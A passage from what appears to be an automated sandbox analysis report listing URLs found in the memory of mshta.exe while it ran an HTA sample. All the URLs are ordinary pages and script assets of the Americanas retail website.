00000000.00000003.25444806712.000000000A9C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378136388.000000000ABD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460523486.000000000A9C2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25479387385.0000000003003000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25478844378.000000000AA3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000ABDC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484690315.00000000094EB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25478844378.000000000AA25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378502221.0000000006F52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://statics-americanas.b2w.io/catalog-statics/acom/public/js/catalogo-ui-americanas-desktop-head
Source: mshta.exe, 00000000.00000003.25478465499.000000000A9C6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403951789.000000000AC3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25486409501.000000000A9C8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25444806712.000000000A9C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378136388.000000000ABD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460523486.000000000A9C2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460429722.000000000AA71000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25444885542.000000000AA75000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25486497616.000000000AA71000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25478844378.000000000AA3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000ABDC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25483822375.00000000093C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400780155.000000000ABE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000AA3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25401639777.000000000AC39000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403038428.000000000AA70000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25488009024.000000000ABF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387237679.000000000ABE6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000ABCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://statics-americanas.b2w.io/catalog-statics/acom/public/js/catalogo-ui-americanas-desktop-miss
Source: mshta.exe, 00000000.00000003.25478465499.000000000A9C6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25486323410.000000000A9BC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403951789.000000000AC3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460619208.000000000AA76000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25486409501.000000000A9C8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410626125.000000000AAA9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25444806712.000000000A9C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378136388.000000000ABD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460523486.000000000A9C2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460429722.000000000AA71000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25444885542.000000000AA75000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25459670621.000000000AAAF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25486497616.000000000AA71000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25478844378.000000000AA3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000ABDC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25459670621.000000000AAA9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402504692.000000000AAA9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25459421880.000000000AC41000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400780155.000000000ABE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://statics-americanas.b2w.io/catalog-statics/acom/public/js/catalogo-ui-americanas-desktop-zion
Source: mshta.exe, 00000000.00000003.25478465499.000000000A9C6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25443295751.00000000093E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403951789.000000000AC3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25486409501.000000000A9C8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410626125.000000000AAA9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25444806712.000000000A9C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378136388.000000000ABD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460523486.000000000A9C2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25478844378.000000000AA3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000ABDC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402504692.000000000AAA9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25459421880.000000000AC41000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400780155.000000000ABE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25375820983.0000000006EF1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000AA3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25401639777.000000000AC39000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403038428.000000000AA70000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25409699291.000000000AAB5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387237679.000000000ABE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://statics-americanas.b2w.io/catalog-statics/acom/public/js/catalogo-ui-americanas-mobile-b2wad
Source: mshta.exe, 00000000.00000003.25385047921.000000000955E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403707173.000000000AC2B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25465016480.000000000AA25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25486323410.000000000A9BC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25485032710.0000000009572000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403951789.000000000AC3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392497277.0000000009570000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378136388.000000000ABD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397933321.0000000006F1A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25478844378.000000000AA3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25409943508.0000000009572000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000ABDC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386380678.000000000307C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000955E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25478844378.000000000AA25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000AA25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25384418209.0000000003069000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400780155.000000000ABE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000AC4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://statics-americanas.b2w.io/catalog-statics/acom/public/js/catalogo-ui-americanas-mobile-theme
Source: mshta.exe, 00000000.00000003.25478465499.000000000A9C6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25458998686.000000000AAD2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403951789.000000000AC3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460619208.000000000AA76000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25486409501.000000000A9C8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25395191337.0000000006F4B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410626125.000000000AAA9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25444806712.000000000A9C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378136388.000000000ABD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460523486.000000000A9C2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460429722.000000000AA71000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25444885542.000000000AA75000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25459670621.000000000AAAF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25375820983.0000000006F38000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25486497616.000000000AA71000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25478844378.000000000AA3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000ABDC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25443861768.000000000AAD2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380701477.0000000006F4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://statics-americanas.b2w.io/catalog-statics/acom/public/js/catalogo-ui-americanas-mobile-zion-
Source: mshta.exe, 00000000.00000003.25387195053.0000000009498000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25465016480.000000000AA25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460055106.0000000009499000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25477923652.0000000006ED2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378553891.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25444186991.000000000A923000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25478844378.000000000AA3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397933321.0000000006EC2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25399279067.000000000A916000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25478844378.000000000AA25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484434504.000000000949C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25375820983.0000000006E97000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000AA25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410412246.0000000006ED0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400030275.000000000A922000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386040349.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25398775142.000000000A914000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000AA3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403434218.0000000006ECD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25405015002.0000000006ECE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386906783.0000000009497000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://statics-americanas.b2w.io/catalog-statics/acom/public/js/main.30defc488d62244ec738.js
Source: mshta.exe, 00000000.00000003.25387195053.0000000009498000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460055106.0000000009499000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25477923652.0000000006ED2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378553891.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397933321.0000000006EC2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484434504.000000000949C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25375820983.0000000006E97000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410412246.0000000006ED0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386040349.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403434218.0000000006ECD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25405015002.0000000006ECE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386906783.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402240267.0000000009499000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://statics-americanas.b2w.io/catalog-statics/acom/public/js/main.30defc488d62244ec738.jsg
Source: mshta.exe, 00000000.00000003.25317891511.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25429809618.0000000009C48000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25429545584.0000000009C47000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25432218796.0000000009C4D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://wishlist-v1-americanas.b2w.io
Source: mshta.exe, 00000000.00000003.25465970538.0000000003069000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25317891511.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25463049047.0000000003069000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392249908.0000000003069000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25429809618.0000000009C48000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25401062587.000000000AB48000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318413580.00000000067A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378136388.000000000ABD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377708580.000000000AB13000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402958159.000000000AAD4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25479723195.0000000003069000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000ABDC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377966306.000000000AB45000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/
Source: mshta.exe, 00000000.00000003.25394294677.00000000094B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484520243.00000000094B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25385047921.00000000094B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392249908.000000000302C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410037652.00000000094B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387100895.000000000302B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/#primaryimage
Source: mshta.exe, 00000000.00000003.25388319887.000000000E5B1000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25486453290.000000000AA68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25375820983.0000000006F2A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25463690570.0000000006F2A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387415599.0000000006F2A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25384395809.000000000E5B1000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25411198817.0000000006F2A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25465160079.0000000006F2A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397841078.000000000B73B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25490436836.000000000B73C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25483822375.00000000093C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25483283460.0000000006F2D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392249908.000000000302C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25384418209.000000000304D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25478844378.000000000AA67000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25398468181.0000000006E81000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25406842009.000000000E5B2000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387100895.000000000302B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376210976.000000000B706000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380626853.000000000B733000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/akam/13/7fa68b1e
Source: mshta.exe, 00000000.00000003.25385047921.000000000955E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392497277.000000000955E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25395908364.000000000955F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/akam/13/7fa68b1eziSf
Source: mshta.exe, 00000000.00000003.25478465499.000000000A9C6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25487080902.000000000AAF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25486409501.000000000A9C8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25444806712.000000000A9C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460523486.000000000A9C2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402958159.000000000AAD4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404840319.000000000AAE5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25317891511.000000000677A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402504692.000000000AAA9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25441922938.0000000009921000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392249908.000000000302C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403359290.000000000AAE0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25401236979.000000000A9B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387100895.000000000302B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/busca/ar-condicionado-split-9000-btus
Source: mshta.exe, 00000000.00000003.25462631431.0000000009447000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25443295751.00000000093E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25483889487.0000000009449000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/busca/aru
Source: mshta.exe, 00000000.00000003.25386040349.00000000094A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25462689449.000000000ACF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.00000000094A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25393422841.00000000094A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25488630378.000000000ACF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392249908.000000000302C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484434504.00000000094A6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25401457586.00000000094A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387100895.000000000302B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318505986.000000000BDEE000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/busca/fantasia-papai-noel
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404918834.0000000009478000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25441269873.0000000009CE3000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386864327.0000000009475000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25422491366.0000000009CE0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25425905302.0000000009CE1000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318069432.000000000676A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25395232047.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318505986.000000000BDEE000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/busca/galaxy-a14?c_bot=Customer-Categorized
Source: mshta.exe, 00000000.00000003.25386576642.000000000947B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25459140045.0000000009480000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404918834.000000000947C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484225410.0000000009480000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410207961.000000000947C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/busca/galaxyt
Source: mshta.exe, 00000000.00000003.25386040349.00000000094A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.00000000094A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25393422841.00000000094A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484434504.00000000094A6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25401457586.00000000094A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/busca/gorro-papai-noelria
Source: mshta.exe, 00000000.00000003.25386040349.00000000094A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.00000000094A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25393422841.00000000094A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484434504.00000000094A6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25401457586.00000000094A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/busca/guirlanda-de-nataln
